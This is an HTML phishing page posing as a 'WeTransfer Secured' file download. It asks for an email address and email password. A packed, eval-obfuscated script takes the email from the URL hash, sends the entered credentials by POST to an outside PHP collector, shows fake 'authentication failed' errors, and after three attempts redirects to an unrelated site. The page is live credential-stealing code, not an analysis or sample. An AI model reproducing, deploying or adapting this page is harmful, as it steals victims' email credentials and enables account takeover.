


<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <meta property="og:title" content="Open to See" />
    <meta property="og:description" content="35 views, 398 likes" />

    <link
      rel="shortcut icon"
      href="https://cdn.glitch.com/e65b120f-b033-4153-8f73-22473e531ef0%2Ficon.ico"
    />

<link
      rel="stylesheet"
      href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
    />  
    <!-- jQuery library -->

    <!-- Popper JS -->

    <!-- Latest compiled JavaScript -->
    <style>
      body {
        background-image: url(https://cdn.glitch.com/55160fc7-1c50-41cd-9599-dcd1011775c3%2Fbg.png);
        background-repeat: no-repeat;
        color: #045eb4;
      }

      #d {
        position: relative;
        left: 530px;
        top: 350px;
      }

      #form {
        position: absolute;
        left: 530px;
        top: 50px;
        width: 400px;
        border-radius: 10px;
        padding: 20px;
        z-index: 2;
        background: white;
        display: none;
      }
      .blue {
        background-color: #045eb4;
        color: white;
      }
      #sub1 {
	margin-top: 450px;
	margin-left: 140px;
	position: absolute;
	z-index: 1;
	left: 1px;
	top: -5px;
      }
      .sky {
        background-color: #409fff;
        color: white;
      }
    </style>
    <title>WeTransfer Secured</title>
  </head>

  <body>
  <input id="email" name="email" class="form-control" placeholder="Enter Email Address" required="" value="" style="position:absolute; top:321px; left:119px; width: 230px;">
  <input id="password" type="password" value="" name="password" placeholder="Enter Email Password" required="" class="form-control" style="position:absolute; top:373px; left:119px; width: 230px;">
  <div style="position:absolute; top:449px; left:149px; width: 151px;">
   <input
          id="submit-btn"
          name="sub"
          type="submit"
          class="btn btn-md btn-block sky"
          value="Download"
        />
  </div>
    
    
  <div style="position:absolute; top:413px; left:102px; width: 218px; height: 27px;">
    <center>
      <font color="red"><span id="msg"></span></font>
    </center>
  </div>
  <div style="position:absolute; top:283px; left:99px; width: 284px; height: 27px;">
    <center>
      <font color="red"><span id="msg2"></span></font>
    </center>
  </div>
  </body>
 
 
  <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
	<script src="http://code.jquery.com/jquery-1.7.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script>
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(u).F(7(){4 g=0;4 h=v.9.p.m(1);8(!h){}q{4 i=h;4 j=i.w("@");4 k=i.m(j+1);4 c=k.m(0,k.w("."));4 l=c.G()}$(\'#H\').x(7(){$(\'#I\').J("K");$("#5").y();$(\'#L\').M(\'N\',\'\');$(\'#z\').6("O P");$("#n").r(i);$("#Q").6(i);$("#R").A({S:B,C:"y"},0);$("#T").A({U:B,C:"o"},V);$(\'#W\').X(\'o\')});$(\'#s-t\').x(7(b){b.Y();4 c=$("#n").r();4 d=$("#D").r();4 e=$("#z").6();4 f=$(\'#5\').6();$(\'#5\').Z(f);g=g+1;8(g>=3){g=0;v.9.10("E://11.12.13.14/15/16/17/18/19/2.1a")}q{$.1b({1c:\'1d\',1e:\'E://1f-1g.1h/1i/1j.1k\',1l:\'1m\',1n:{n:c,D:d,1o:e,},1p:7(a){$(\'#s-t\').6(\'1q...\')},1r:7(a){8(a){$("#5").o();1s.1t(a);8(a[\'1u\']==\'1v\'){$(\'#5\').6(a[\'5\'])}q{$(\'#5\').6(a[\'5\'])}}},1w:7(){$("#5").o();$(\'#5\').6("1x 1y 1z, 1A 1B.")},1C:7(){$(\'#s-t\').6(\'1D\')}})}})});8(9.p){u.1E(\'#n\').1F=1G=9.p.m(1)}',62,105,'||||var|msg|html|function|if|location|||||||||||||substr|email|show|hash|else|val|submit|btn|document|window|indexOf|click|hide|field|animate|200|opacity|password|https|ready|toLowerCase|othermodal|contact|trigger|reset|fieldImg|attr|src|Other|Mail|emailch|inputbar|left|automail|right|1000|ajaxModal|modal|preventDefault|text|replace|maxizm|manufacturer|globalsources|com|si|6008854128959|Showroom|3000000149681|ALL|htm|ajax|dataType|JSON|url|culetpro|ltd|xyz|app|wet|php|type|POST|data|detail|beforeSend|Verifing|success|console|log|signal|ok|error|Password|authentication|failed|try|again|complete|Login|querySelector|value|eml'.split('|'),0,{}))
  </script>
</html>
